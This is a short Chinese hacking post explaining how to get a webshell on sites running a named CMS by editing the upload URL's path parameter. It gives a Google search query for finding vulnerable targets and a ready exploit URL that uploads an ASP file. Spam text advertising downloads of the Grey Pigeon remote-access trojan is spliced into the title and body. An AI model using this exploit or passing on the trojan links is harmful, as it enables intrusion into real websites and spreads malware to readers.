修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載www.huigezi.org

admin

修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載


大家可能都看見過這樣的漏洞，這里以瘋子的嘉友科技cms上傳漏洞為例。

谷歌關(guān)鍵字：inurl:newslist.asp?NodeCode=   灰鴿子使用教程灰鴿子下載exp：
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上傳目錄是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出對(duì)參數(shù)PicPath進(jìn)行了修改，
這種漏洞主要是存在文件名或者路徑過濾不嚴(yán)，在實(shí)戰(zhàn)中多多觀察url中的參數(shù)，可以嘗試進(jìn)行修改數(shù)據(jù)。